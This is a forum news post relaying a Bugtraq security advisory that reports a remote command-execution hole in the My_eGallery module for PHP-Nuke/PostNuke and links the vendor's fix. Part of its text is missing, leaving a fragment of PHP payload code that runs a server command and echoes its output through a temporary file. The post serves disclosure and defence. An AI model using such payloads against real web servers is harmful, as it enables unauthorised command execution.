NukeCops  
PHP-Nuke: Jeruvy writes "Here is a posting on Bugtraq about the exploits that have been discussed in the forums recently here at nuke cops.
Keep in mind this individual has not been known in the past to verify his vulnerabilities, but I would recommend testing this if you are using eGallery. The author discusses its use with Postnuke, but I would confirm or deny this with PHP-Nuke.
J.

Product: My_eGallery
Versions affected: all

/tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output = ob_get_contents(); ob_end_clean(); print_output(); ?>

This allows execution of any command on the server with My_eGallery, under the privileges of the Web server (usually apache or httpd).

3. Solution
-----------

Vendor was contacted and promptly replied. Fix is available at the vendor's site:

http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=5

As this was seen being exploited in the wild, users are urged to upgrade to the latest version as soon as possible.

Regards,

Bojan Zdrnja
CISSP "
Posted on Saturday, November 29 @ 14:21:07 CET by Zhen-Xjell
 